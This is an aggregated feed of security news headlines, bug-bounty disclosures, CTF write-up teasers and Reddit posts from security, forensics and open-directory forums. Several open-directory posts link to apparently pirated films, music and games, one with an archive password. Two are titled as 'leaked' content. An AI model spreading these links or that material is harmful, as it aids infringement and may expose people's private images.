    Why did my last movie post disappear?
    submitted by /u/International_Milk_1 [link] [comments]
    If you'll allow me-for movie or tv show fans.
    There might be one person out there who doesn't know this. So let's say you download a movie, expecting it to be in the English language, but find that Harrison Ford is speaking Persian, and it doesn't even sound like Mr F. In whatever player you use, go to the audio option, and check if there is an alternative track. To make sure there is an English language track, before downloading, copy the link of the movie/TV episode, and open it in your player. Then you can check before downloading. submitted by /u/International_Milk_1 [link] [comments]  ( 2 min )
    I'd like to make a motion for a couple of new flairs: "Junk Science" and "Conspiracy"
    submitted by /u/brother_p [link] [comments]  ( 1 min )
  • Open

    Ethical Hacking Roadmap and Resources
    Checklist for the things that one has to learn while learning Linux: Shell, Navigation, File System, Redirection, Permissions, Processes… Continue reading on Medium »  ( 4 min )
    Full account takeover vulnerability in Minecraft
    Continue reading on Medium »  ( 2 min )
    WEB VULNERABILITIES 7.0
    C R O S S - S I T E S SCRIPTING Continue reading on Medium »  ( 6 min )
    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    Unlucky Story, Judge Duplicate, and Only Get a Thank You. But It makes Me smile.
    This is from my local bounty program in my country, Indonesia. I found some vulnerabilities in an e-commerce website and I think it would… Continue reading on Medium »  ( 1 min )
    From Simple Recon to Reflected XSS
    whoami Continue reading on Medium »  ( 2 min )
    How I Bypassed Netflix Profile Lock?
    Hi hackers, Continue reading on InfoSec Write-ups »  ( 2 min )
    HOW I GOT MY SECOND SWAG
    Hi everyone! Hope you all are doing good. In this article i am going to show you how i got my second swag from Ivanti by reporting an open… Continue reading on Medium »  ( 2 min )
    DOM Based XSS
    DOM based XSS (cross site scripting) is a client side vulnerability that arises when the javascript takes data from user controllable… Continue reading on Medium »  ( 3 min )
  • Open

    Help with Autopsy on Mac
    Hi, I need to use Autopsy to analyse an E01 image for my project but am struggling to get it set up on my Mac (running Mojave). I downloaded the .zip file from autopsy and have all the files but can't seem to get the GUI running. I installed it via 'brew' but at the end of the install it said error Xcode version too low. So I don't know if it has installed properly. Any help would be appreciated. Thanks submitted by /u/UserNo007 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-27 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    TryHackMe: OhSINT — WriteUp
    Is your information safe enough on internet? Continue reading on Medium »  ( 4 min )
    OSINT Series … Part-1
    What is OSINT ? Continue reading on Medium »  ( 2 min )
  • Open

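    FreeBuf Morning Report | Ubisoft reportedly deletes inactive paying players' accounts; White House invites vendors to discuss strengthening open-source security
    An anonymous user found that his game account on the Ubisoft platform had been deleted; he had earlier received a warning email requiring him to log in within 30 days or have the account permanently deleted.  ( 1 min )
    Encircled from all sides, deadbeat debtors exposed: a protracted war against the anti-debt-collection black market
    The financial industry's long-running war against the anti-debt-collection black market has finally reached deep water.  ( 1 min )
    Office of the Central Cyberspace Affairs Commission releases the "14th Five-Year Plan for National Informatization"
    The Plan is an important part of the national planning system for the 14th Five-Year Plan period and serves as the action guide for informatization work across regions and departments during that period.
    MIIT and the Standardization Administration of China jointly issue the "Guidelines for the Construction of the Industrial Internet Comprehensive Standardization System (2021 Edition)"
    The Guidelines propose that by 2023 the industrial internet standards system will continue to improve, with more than 15 basic common standards formulated covering terminology and definitions, general requirements, supply chain/industry chain, talent, and other areas.
    "Data Security Compliance Management Guidelines for Enterprises Supervised by the Guangzhou SASAC (Trial, 2021 Edition)" released
    The Guidelines refine and flesh out the requirements of higher-level law, becoming the first compliance operations guide from a local state-owned assets regulator dedicated to the area of data compliance.
    Building a financial-loss prevention and control system for the Yidun SaaS system
    Business security mainly provides authentication-type services, including CAPTCHAs, phone number logs, and information verification. Mobile security protects customers' applications through hardening and other means to prevent reverse engineering and cracking.  ( 1 min )
    Who moved my printer?
    By October 2021 the problem had become serious: a large number of Windows 10 users who had installed the October patches found they could no longer use network printers normally.  ( 1 min )
    Advantages of the token mechanism over the cookie mechanism
    When the client frequently requests data from the server, the server has to frequently query the database for the username and password, compare them, determine whether they are correct, and respond accordingly; it is against this background that the token came into being. Simply  ( 1 min )
    Web application attacks are surging; it's time to protect APIs!
    Since October 2019, web application attacks against UK businesses have increased by 251%.  ( 1 min )
    Tech Share | Common DDoS attack types and defensive measures
    DDoS attacks will be characterized by high frequency, high growth, and large traffic volumes, and their threat to network security will increase by the day, so putting DDoS protection in place is urgent.  ( 1 min )
    Ransomware may become the biggest threat of 2022; French IT services company hit by ransomware attack | Global cybersecurity highlights for December 27
    Security experts have discovered a new banking trojan spread through fake Google Play store pages. Unknown actors pretend to present the app of a well-known bank.  ( 1 min )
    The "attendance clock-in tools" found online are actually cheating tools from the black and gray market
    Although the "attendance clock-in tools" found online can relieve some workers of the "hassle" of clocking in, this is falsified attendance and a breach of workplace trust.
    Experts detail macOS vulnerability that lets malware bypass Gatekeeper
    The root of the problem lies in unsigned, un-notarized script-based applications that do not explicitly specify an interpreter, which results in a complete bypass.  ( 1 min )
    Usage up 46%: privacy-focused search engine DuckDuckGo is growing rapidly
    The privacy-focused search engine DuckDuckGo continued to grow rapidly in 2021 and now averages more than 100 million search queries per day.  ( 1 min )
    From network security to cloud services, Topsec uses security to support the development of the cloud computing industry
    Topsec develops its own cloud products with an integration mindset and uses security to support the development of the cloud computing industry.
    Do you really know how to use a search engine? Learn these advanced operators to get twice the result with half the effort
    This article introduces several commonly used advanced search engine operators; mastering them will make your information retrieval far more efficient.  ( 1 min )
    Gartner releases five impactful technologies from its 2022 Emerging Technologies and Trends Impact Radar
    This year's Emerging Technologies and Trends Impact Radar contains 23 emerging trends and technologies most likely to bring change and transformation to the market.
    From zero to one: a deep dive into the log4j2 JNDI RCE vulnerability CVE-2021-44228
    By introducing the Java logging ecosystem and analyzing the log4j2 source code, this article takes you deep into this "nuclear bomb" vulnerability that shook the internet.  ( 2 min )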
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    Untitled
    VK.com disclosed a bug submitted by azimoff: https://hackerone.com/reports/1300583 - Bounty: $300
    Bot setting information leakage in OpenChat room
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1305432 - Bounty: $200
    Access to images and videos in drafts on LINE BLOG
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1290170 - Bounty: $780
    Missing authentication in buddy group API of LINE TIMELINE
    LINE disclosed a bug submitted by e26174222: https://hackerone.com/reports/1283938 - Bounty: $3000
    See drafts and post articles if the account owner hasn't set password (livedoor CMS plugin)
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1278881 - Bounty: $1300
    Missing ownership check in 2FA for secondary client login
    LINE disclosed a bug submitted by shi0n: https://hackerone.com/reports/1250474 - Bounty: $7500
    Developer uploaded files missing authentication on LINE GAME Developers site(gdc.game.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/969605 - Bounty: $1000
    Password reset by malicious input on air.line.me
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/968742 - Bounty: $500
    LINE Profile ID leaks in OpenChat
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/927338 - Bounty: $3000

  • Open

    Various stuff - mostly photos
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    Music
    submitted by /u/International_Milk_1 [link] [comments]
    A nice list of movies, and older tv series such as Mannix
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    1.19TB of documentaries, many with subtitles (repost from January 2019)
    submitted by /u/Throw10111021 [link] [comments]  ( 1 min )
    "Poetry for the Beat Generation" plus some jazz albums (flac)
    Finally found "Poetry for the Beat Generation" with Allen on piano and Kerouac reciting http://109.120.203.163/Music/Acid%20jazz/ submitted by /u/SexRevolutionnow [link] [comments]
    Music which was pasted before, but at different link
    submitted by /u/International_Milk_1 [link] [comments]
    Movies and tv shows. But it's a mixture of those which are dubbed in persian/iranian with no english audio option, and those with english language soundtrack and persian/iranian subs. But subs can be turned off. Speed is so so I guess.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    XSPF VLC Playlist of movies I found here
    Please delete if not allowed Hi guys, awhile ago I made a quick and easy browser tool to convert links into a VLC Playlist, you might be wondering why I opted out of M3U playlists, honestly for future expansion, m3u playlists tend to be pretty simple on the SPEC, can't define much, while XSPF allows for things like duration setting. It is a goal to rewrite this eventually and figure out a way of showing the duration, probably using an API of some kind. (my tool: https://csmit195.github.io/Links-to-XSPF-Web-App/) I have two files, one is 14.1k movies, and the other is 4.1k movies. My PC is fairly fast and loading the 14.1k movies took about 3mins, while the 4.1k only takes 10secs. Please test carefully with the 14.1k, some PCs might fail to load it, vlc could crash b4 finish loading. Downloads: note: the top 1.1k movies of both files are more popular than the ones below it 14.1K Movies (4.1K Movies from below included) https://drive.google.com/file/d/1gSjguuPTTyP_2oVktKD_YqbaAZStpEu4/view?usp=sharing 4.1K Movies https://drive.google.com/file/d/1dSb3d_CDbsvR7UO8nnnDBdYmJmsuBPv2/view?usp=sharing If you want more or have a really good source of direct movie links, feel free to lmk and I'll create more playlists. For now, enjoy and would love feedback (please no code reviews, I made it quickly so I can achieve this goal, wasn't really built for production, I'd love to optimise it in the future tho). Cheers, Chris submitted by /u/csmit195 [link] [comments]  ( 2 min )
  • Open

    A capability-safe language would have minimized the Log4j vulnerability
    Article URL: https://justinpombrio.net/2021/12/26/preventing-log4j-with-capabilities.html Comments URL: https://news.ycombinator.com/item?id=29696318 Points: 94 # Comments: 142  ( 6 min )
  • Open

    Abeats Bounty Program
    Aiming to test the website's usability, the bounty program is ideal for gathering engagement from the community and finding the necessary… Continue reading on Medium »  ( 1 min )
    CVE-2021–40579
    Insecure direct object references (IDOR) Continue reading on Medium »  ( 1 min )
    Passive Information Gathering for Pentesting
    Information gathering is very important for a pentester. Continue reading on Medium »  ( 2 min )
  • Open

    How do I start with Netsec ?
    I am currently enrolled in a computer science degree and asked myself what I want to do with it. I often found myself at one field, Security. However I have no clue on how or where to start learning more about the field. For example I find pentesting especially interesting and searched for ways to get into the field. I found two ideologies for that, one being hands on experience and the other being strong basics. However that only gave me more questions. First: what is "Hands-on experience"? Do I have to hack my own laptop or crack my neighbor's Wifi password? Or is it much simpler to get experience? Second: Basics of what? How a computer works? The different protocols of the internet? And also, how do I get strong basics? Where do I even start? submitted by /u/CallMeNepNep [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-26 Review
    gosint open-sourced, by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Cracked5pider/KaynLdr: KaynLdr is a Reflective Loader written in C/ASM
    submitted by /u/dmchell [link] [comments]
  • Open

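    FreeBuf Morning Report | Some apps can still obtain user information with all permissions denied; pirated copies of "Spider-Man" contain malware
    Some pirated copies of "Spider-Man: No Way Home" contain trojans or bundled malware, and some even include cryptomining programs.  ( 1 min )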
  • Open

    Advent of Cyber 3 Day 16 - Ransomware Madness Walkthrough
    You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang.  As… Continue reading on Medium »  ( 2 min )
    Log4Shell — You should know about it.
    Hello everyone! Continue reading on Medium »
  • Open

    What is a Watering Hole Attacks and How to Prevent Them
    submitted by /u/bee925p [link] [comments]  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    Weaponize JScript to bypass Windows Defender
    To gain initial access during a Red Team Engagement, Phishing might be a valid option. Continue reading on Medium »  ( 3 min )
  • Open

    Accessing data in suspect disk
    After copying with write block how do investigators access data in an encrypted drive? Do they have to break the encryption password with powerful servers? Or are there other methods? submitted by /u/thecirclingfly [link] [comments]  ( 2 min )

  • Open

    Join Synack Red Team
    Hi, how to join synack after finishing HTB track submitted by /u/0xA1MN [link] [comments]
    Stay organized with your pentesting knowledge
    Hi, I am not a professional, I just love pentesting/CTF stuff and I discover new things every day, thanks to HackTheBox, TryHackMe and other platforms. I would like to collect all my knowledge online, let's say a webpage with methodology step-by-step: information gathering scanning search for vulnerabilities and so on.. I would like to put "cheatsheet" for useful commands like nmap, dirbuster, sqlmap .. I tried a simple blog with Wordpress, but I am wondering if you use something better (github)? Thank you. submitted by /u/g-simon [link] [comments]  ( 2 min )
    Firewall+IPS hardware recommendations for a home LAN setup
    Hi All, i'm planning to play around with some firewall distros that have IPS/Suricata enabled. Target environment is for a SOHO with around 10 people, not hosting any web servers or whatnot. Any hardware recommendations, particularly on the CPU and RAM? Is a Pentium Gold G6400(2 cores, 4 threads) and 4GB RAM good enough? i read somewhere that CPU(# of cores) carries more weight than RAM, IPS-wise. Would it make sense to use AMD processors instead? Wouldn't the GPU cores just go to waste on a firewall/IPS? tia submitted by /u/albertcuy [link] [comments]  ( 1 min )
    How secure is it to stay logged into a site?
    Say you stay logged into an email or social media site, is there any risk in doing so? submitted by /u/RaZdoT [link] [comments]  ( 1 min )
    How secure is Netgear RAX45 VPN with Remote Desktop?
    I turned on VPN in router settings, which uses OpenVPN, and successfully set up a Remote Desktop, using OpenVPN Client and Remote Desktop for windows 10. Wanted to ask: - how secure is this setup? - is there a better way to have a cheap and personal/small business secure Remote Desktop with VPN? submitted by /u/WiseMan9000 [link] [comments]  ( 1 min )
  • Open

    Smallish list of older movies. Nothing after 1972. Some good stuff here.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Animation with audio options for English or Farsi, according to the few I checked (slow, though)
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

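    From getting to know DongTai IAST to joining the open-source community
    As a member of the company's information security department, ensuring application security for every line of business is part of my job. So how do I accomplish this mission?  ( 1 min )
    Writing an Xposed Module from 0 to 1: Anti Screenshot
    A newbie's journey into screenshots  ( 1 min )
    Abaddon: an enhancement tool designed for red team researchers
    Abaddon aims to help red team researchers improve operational efficiency and carry out certain repetitive operations faster and more stealthily.  ( 1 min )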
  • Open

    HOW I Found 17 Critical and Medium Security Bug on INDUSIND Bank
    Hi, everyone Continue reading on Medium »  ( 3 min )
    How I got access Maxlifeinsurance insurance company AWS metadata access by SSRF
    Hi, everyone Continue reading on Medium »  ( 3 min )
    Jerry From Hackthebox
    Hello everyone I am HAC and Today we will be doing jerry from Hackthebox Continue reading on Medium »  ( 2 min )
    Massive Users Account Takeovers(Chaining Vulnerabilities to IDOR)
    Hello hunters 👋✌ this is my 7th writeup 🧾, Continue reading on Medium »  ( 2 min )
    SQL Injection — 1st Dose
    An Injection that is not used for treatment! Continue reading on Medium »  ( 2 min )
    Information Disclosure leads to sensitive credential($$$)
    Hi Hackers, hope you are fine. My name is khan mamun (white hat hacker). This is my 3rd write up. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-25 Review
    No news updates today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    I found (and fixed) a vulnerability in Python
    Article URL: https://tldr.engineering/how-i-found-and-fixed-a-vulnerability-in-python/ Comments URL: https://news.ycombinator.com/item?id=29683853 Points: 3 # Comments: 0  ( 2 min )
  • Open

    Router Management Practices: Web, App, and forcing to associate user home network with a vendor account
    submitted by /u/wkwrd [link] [comments]
    Make Your Pc Notify Your Phone Whenever There is Movement Around it
    submitted by /u/MagicianPutrid5245 [link] [comments]  ( 1 min )
  • Open

    Empire: LupinOne Vulnhub Walkthrough
    Empire: LupinOne is a Vulnhub easy-medium machine designed by icex64 and Empire Cybersecurity. This lab is appropriate for seasoned CTF players who want to put The post Empire: LupinOne Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CaseVegas Walkthrough — Cyberdefenders
    Challenge: CaseVegas Continue reading on Medium »  ( 7 min )
  • Open

    Forensic Courses
    Took the video lectures from EC Council CHFI. But it did not teach me how to use tools or real world data just the theory. Can you suggest a course/resource/links that teach you how to use forensic tools with real world scenarios. submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    A bit of amateur detective work
    Hi all, I am looking at some student submissions of word 2010 docs. I suspect the time stamp has been changed in some way. Is there a way to verify it beyond just looking at the word doc's property? submitted by /u/HelloAmes [link] [comments]  ( 2 min )

  • Open

    I set up MAC address filtering but there are still unrecognized devices on my network. Is this normal?
    I recently set up MAC address filtering (white-list/allow-list) to only allow certain devices to connect to my network. However, when I check connected devices, I still see two devices that I don't recognize and they are not in my allow-list. How are they connecting to the network? I tested the MAC address filtering with my phone temporarily removing it from the list, and the filter worked. So I am confused why those two devices are not blocked. For what it's worth, both devices are showing as "Espressif Inc" and are probably part of my smart devices, so I am not too concerned about them. However, I would still like to understand why they are not being blocked by the filter. submitted by /u/ultrakawaii [link] [comments]  ( 1 min )
    identifies SSL/TLS dependencies
    Hello, It may look like a noob question but, It's my first job and... We have servers on which weak SSL/TLS versions are running. So, I have spoken with server owners, checked on which port their usage has been detected. At the end of the investigation, I had determined that it was ok if I disabled TLS 1.0 and 1.1. But this was a mistake and one of our important applications couldn't communicate anymore with our SQL server. In the panic I reversed all of my changes. And now I'm afraid of trying to patch these issues. So what was the best way to detect the usage of SSL/TLS? Should I sniff every server with Wireshark or something else? Thank you all submitted by /u/Low_Lettuce_8933 [link] [comments]  ( 2 min )
    How to view the exploit code of metasploit's auxiliary or exploits?
    I've been trying to get shell into an exploit of SMB but I think it uses somewhat of a buffer overflow scheme. Any way to see the exploit [code] behind metasploit exploits? Here's the exploit I've been trying to use: exploit/windows/smb/ms17_010_eternalblue submitted by /u/The_Intellectualist [link] [comments]  ( 1 min )
  • Open

    Threat in lunar client?? java.trojan.genericgba.30921
    Hello, I recently did an analysis with bitdefender and I detected this threat: java.trojan.genericgba.30921 but I looked for this name on the internet but nothing came out, the strange thing is that the threat was detected in a Lunar Client folder (A minecraft client) and also in a minecraft mod (Geyser) this seems very strange to me because according to the lunar client and geyser mod it is safe, does someone here have an answer to why it is detected as a threat? submitted by /u/QuirkyCod4995 [link] [comments]  ( 1 min )
    About work fields (investigation, private market etc).
    I'm 18 and I'm from Brazil. I'm currently studying Computer Science. Some things led me to become interested in computer forensics these past months, and I'm interested in following this career. Since here in Brazil you first need a CS degree to do a computer forensics course, I'm focused on finishing my CS course first for now. I looked at the FAQ here and got a lot of useful information, but I still have one that wasn't answered: what are the fields you can work? I know you can work in law enforcement and do forensics analysis to find digital evidence of a suspect (which is most cases I believe), but can you work on the investigation field (like tracing criminals online)? If not, how do I work on this investigation field related to crimes online? Is computer forensics the best thing to study in this case? Another question is: on the private work field, how does it work? Do you work with data recovery stuff? I hope I don't annoy you with those questions, but I couldn't find them here yet! submitted by /u/silva-txt [link] [comments]  ( 1 min )
    Timeline
    hi, is there a way in excel or other software to put a list of phonecalls, their dates and time and get a timeline that show how many calls were made to the same phone or to the same phone by date and time. Thanks in advance. submitted by /u/joshmaidom [link] [comments]  ( 1 min )
    ?? After seizing an Android 10, should keep charging battery ??
    There may be weeks before digital forensic people come to examine the Android 10 phone with unknown passcode. It was in use when seized, but later auto locked. Pls Help: (1) Should keep it in power on and keep charging it? since battery cannot last long enough for weeks. (2) Would it be harder to unlock or retrieve data if let it power down and then switch on later? submitted by /u/Just_Drama5668 [link] [comments]  ( 2 min )
  • Open

    Joni Mitchell albums
    submitted by /u/International_Milk_1 [link] [comments]
    Clifford D Simak reading City
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Hmm. Some music, but other types of audio (see comment)
    submitted by /u/International_Milk_1 [link] [comments]
    Tons of pirated video games
    Hi i use this website for repacks ddl http://s5.gamingmaster.ir it has a home page too http://gamingmaster.ir ​ archives password: gamingmaster.ir submitted by /u/develhoper [link] [comments]  ( 1 min )
    movies, korean tv dramas, tv series, etc etc (some txts in english, some in korean-same with content-no english subs for korean dramas)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies, tv shows, music, manga, etc etc (slow speeds)
    submitted by /u/International_Milk_1 [link] [comments]
    music for ringtones
    submitted by /u/International_Milk_1 [link] [comments]
    one very small music list (at least in open directory format-see below) , and 1 very small movie list, with slow speeds.
    The movie one Index of / The Music one Index of /Directos/ (ladiscoteca.net) If you go to parent directory, there is a lot more stuff divided into years, genres etc etc. There is a radio player if you stroll down, Maybe someone else can do a better job of explaining it than me. Although it is not in open directory format. So if you just want to stream, it's good. I think the sound is great though. The one hit wonders is a nice one. submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Anything you want here is for free
    Download limit exceeded for Main drive now 😔 limit resets at 2021-12-25 at 00:00:00 UTC. https://premiuim.rahuljayant.workers.dev/0:/ Edit - You can search from the hamburger menu - For username and password for 18+ from Drop down menu DM , otherwise post will be labelled as NSFW. submitted by /u/rahuljayant1 [link] [comments]  ( 2 min )
    Documentation for classic computers
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    documentary type shows
    https://archive.org/download/pbsnovadocs https://davfl70.org/~davflsev/movies/WWI/ https://ir2.papionvod.ir/Media/Series/Terra%20Nova/Season%201/ http://flixhub.net/Data/Disk3/English%20Tv%20Serise/Planet%20Earth/Season%2001/ https://archive.org/download/Cops-Seasons-1-33-Cops-Reloaded https://archive.org/download/DocuCollection_201702 https://archive.org/download/InsideTheAmericanMobS01E06EndGame 2nd and 3rd links have a ton in their parent directories and 4th is from the most recent post here, sorry for that repost but i figured it id save someone the time of scrounging thru submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    science fiction and fantasy folk music (small selection)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    movies
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    How to exploit Log4j vulnerabilities in VMWare…
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    Hunting down spider-man using Sherlock
    Ever wondered how to get the social media links of your favorite marvel superheroes or as a matter anyone’s else online social presence? Continue reading on Medium »  ( 1 min )
    Your Stalker Wants Your Outlet
    As crazy as it may sound, your stalker is looking for any possible clue in your photos to get a general idea of where you’re located and… Continue reading on Medium »  ( 1 min )
  • Open

    Micropatching “Ms-Officecmd” Remote Code Execution (No CVE)
    Article URL: https://blog.0patch.com/2021/12/micropatching-ms-officecmd-remote-code.html Comments URL: https://news.ycombinator.com/item?id=29674988 Points: 3 # Comments: 0  ( 5 min )
    Where's the Interpreter? (CVE-2021-30853)
    Article URL: https://objective-see.com/blog/blog_0x6A.html Comments URL: https://news.ycombinator.com/item?id=29669026 Points: 3 # Comments: 0  ( 28 min )
  • Open

    Free public Docker image vulnerability DB
    Article URL: https://dso.atomist.com/explore Comments URL: https://news.ycombinator.com/item?id=29674898 Points: 2 # Comments: 0
    ShortList: Log4j Vulnerability Tools
    Article URL: https://haydenjames.io/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29673107 Points: 1 # Comments: 0  ( 4 min )
    Alberta MLA resigns after RCMP searches home after vulnerability report
    Article URL: https://www.cbc.ca/news/canada/edmonton/alberta-mla-thomas-dang-resigns-from-ndp-caucus-after-rcmp-searches-home-1.6294219 Comments URL: https://news.ycombinator.com/item?id=29670252 Points: 9 # Comments: 0  ( 2 min )
  • Open

    SecWiki News 2021-12-24 Review
    Using CodeQL to analyze and hunt for Log4j vulnerabilities, by ourren. vulntarget vulnerable lab series (2): vulntarget-b, by ourren. For more of the latest articles, visit SecWiki
  • Open

    Full Path Disclosure in Wordpress Rest API Response
    Showmax disclosed a bug submitted by fariqfgi: https://hackerone.com/reports/1358888 - Bounty: $50
    Xss At Shopify Email App
    Shopify disclosed a bug submitted by shaktiranjan867: https://hackerone.com/reports/1339356 - Bounty: $500
    Reflected XSS on dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1212235
    Reflected XSS at dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1210921
  • Open

    Vibranium Debug Campaign
    Vibranium is pleased to announce the debug bounty campaign! Continue reading on Medium »  ( 2 min )
    Getting access to the Database of a Crypto Exchange using Google Dorks!
    Hello, Continue reading on Medium »  ( 2 min )
    Crema Bug Bounty Program Winners Announcement
    Continue reading on Medium »  ( 1 min )
    Install Nuclei on Kali Linux [Latest using go1.17]
    Nuclei : Vulnerability Scanner. Continue reading on Medium »  ( 1 min )
    Exposing Millions of Investor and Startup Register details and PII INFO in STARTUPINDIA (Govt of…
    Hi, everyone Continue reading on Medium »  ( 5 min )
  • Open

    Cloud Security Breaches and Vulnerabilities: 2021 in Review
    submitted by /u/thorn42 [link] [comments]
    Blister malware can breach your devices in absolute stealth
    submitted by /u/IT_band [link] [comments]  ( 1 min )
    Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell
    submitted by /u/aalex954 [link] [comments]
  • Open

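    Five cybersecurity predictions for 2022 and beyond
    Cybersecurity industry leaders currently face numerous challenges, and these will continue to grow over the next few years.  ( 1 min )
    CVE-2021-31956 vulnerability analysis
    Overall it is not very difficult and is well suited to beginners.  ( 1 min )
    FreeBuf in-house security group discussion | How should the value of enterprise security actually be measured?
    Someone offered the analogy that security is like the guardrails on either side of a bridge: if nothing goes wrong nobody notices its value, yet without it people feel uneasy.
    IoT SAFE: strengthening the security of the IoT ecosystem
    There is light at the end of the tunnel.  ( 1 min )
    See you next year | CIS 2021 Spring Edition topic-preview livestream concludes successfully
    This Christmas, I don't want you to be alone, because FreeBuf Open Class is here to keep you company. From December 21 to December 23 at 7 pm each evening, FreeBuf Open Class invited guests from the conference's forums to preview their topics live, joining 13 technical experts in the livestream to discuss new cybersecurity technologies and trends. Without leaving home, get an early grasp of the substance of each sub-forum and interact up close with industry leaders, so this Christmas you are no longer alone. Over these 3 days of livestreams, guests from all walks of life brought to the representatives and standouts among the broadest range of front-line cybersecurity workers a wealth of  ( 1 min )
    Methods for kernel-level interception of Windows ALPC
    ALPC is just a standard protocol; the specific content differs for each service, such as creating a service, creating an account, or querying system information, so you have to decode it manually yourself.  ( 2 min )
    What is a CDN? How does a CDN work?
    A CDN is a content delivery network built on top of the network, relying on edge servers deployed in various locations.
    Building a proactive vulnerability management system for critical information infrastructure based on vulnerability prioritization | World Information Security Conference
    A brief discussion of building a proactive vulnerability defense system for critical information infrastructure.  ( 1 min )
    "Work Guidelines for Reporting and Sharing Data Security Risk Information in the Industry and Information Technology Sector (Trial) (Draft for Comment)" released
    The Work Guidelines state that risk information reporting refers to the act of relevant entities reporting data security risk information to the Ministry of Industry and Information Technology, local industry and information technology authorities, and local communications administrations.
    What information should we collect in web penetration testing?
    Know yourself and know your enemy, and you will never be defeated. One article to understand how to maximize information gathering in the early stage of a penetration test.  ( 1 min )
    Because of too much fraud, VK, the "Russian WeChat", makes two-factor authentication mandatory
    VK has finally begun introducing two-factor authentication and plans to require administrators of large communities to use it in February 2022.  ( 1 min )
    Research shows credential stuffing attacks will surge over the Christmas period
    Research analysis says credential stuffing incidents increased by 56% during last year's Christmas and New Year shopping period, and up to 8 million attacks per day against consumers are expected in the same period of 2021.  ( 1 min )
    Reverse engineering tutorial (2): Base camp
    Reverse engineering tutorial (1): Debugging code. New debugging commands: I expect that by practicing along with the previous article you have mastered the basic commands mentioned. Let's review them: F7, F8, Ctrl+F2, Ctrl+F9; if they feel unfamiliar, I suggest going back and relearning them. Because today we are again going to start learning about  ( 1 min )
    FreeBuf Weekly | Gumtree classifieds site leaks customer information; Hive ransomware is launching large-scale cyberattacks
    We summarize and recommend this week's hot news, quality articles, and hassle-free tools, so you don't miss any of this week's key points!  ( 1 min )
    Building a large-scale traffic data computing and analysis platform, and industry practice | A first look at topics at the CIS 2021 Spring Edition conference
    Building a large-scale traffic-based data analysis platform can give enterprises more dynamic and precise marketing recommendations and safeguard data from a security standpoint.  ( 1 min )
    NVIDIA discloses its applications affected by the Log4j vulnerability
    The Log4Shell vulnerability is being heavily exploited in attacks worldwide.  ( 1 min )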
  • Open

    [project]Bypass Firewalls using Various Evasion Techniques
    Bypass windows firewall using Nmap evasion techniques Continue reading on Medium »  ( 2 min )
  • Open

    SQL Injection JR. Pentester -TryHackMe Part 2
    Hi folks, welcome back to part 2 of SQL injection in JR. Pentester path.  ( 3 min )
    Identity Management Vulnerability Taxonomy v1.5
    I really like the OWASP list of vulnerabilities because it mostly stays at a uniform level of abstraction. Some issues are fairly… Continue reading on InfoSec Write-ups »  ( 4 min )
  • Open

    Tg pinay
    submitted by /u/kotsu0401 [link] [comments]
    TG pinay leaked
    submitted by /u/kotsu0401 [link] [comments]
    APK for music, movies etc etc
    submitted by /u/International_Milk_1 [link] [comments]
    Index of /library/
    Lots of PDFs in all kinds of subjects. http://erewhon.superkuh.com/library/ submitted by /u/CourseCalm [link] [comments]
    Several albums of deep-sea robot dives from Columbia University's climate school
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Writing/Poetry Anthology Drafts
    submitted by /u/VeinyNotebook [link] [comments]
  • Open

    My smart TV has some sketchy ports open. Any clues?
    I captured some persistent host discovery traffic on my home WiFi network with Wireshark. There's a never-ending activity in UDP and SSDP coming from this device. A basic nmap scan shows the following:
        Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-23 18:37 -03
        Initiating ARP Ping Scan at 18:37
        Scanning 192.168.1.11 [1 port]
        Completed ARP Ping Scan at 18:37, 0.13s elapsed (1 total hosts)
        Initiating Parallel DNS resolution of 1 host. at 18:37
        Completed Parallel DNS resolution of 1 host. at 18:37, 0.01s elapsed
        Initiating SYN Stealth Scan at 18:37
        Scanning 192.168.1.11 [1000 ports]
        Discovered open port 8080/tcp on 192.168.1.11
        Discovered open port 9001/tcp on 192.168.1.11
        Discovered open port 9080/tcp on 192.168.1.11
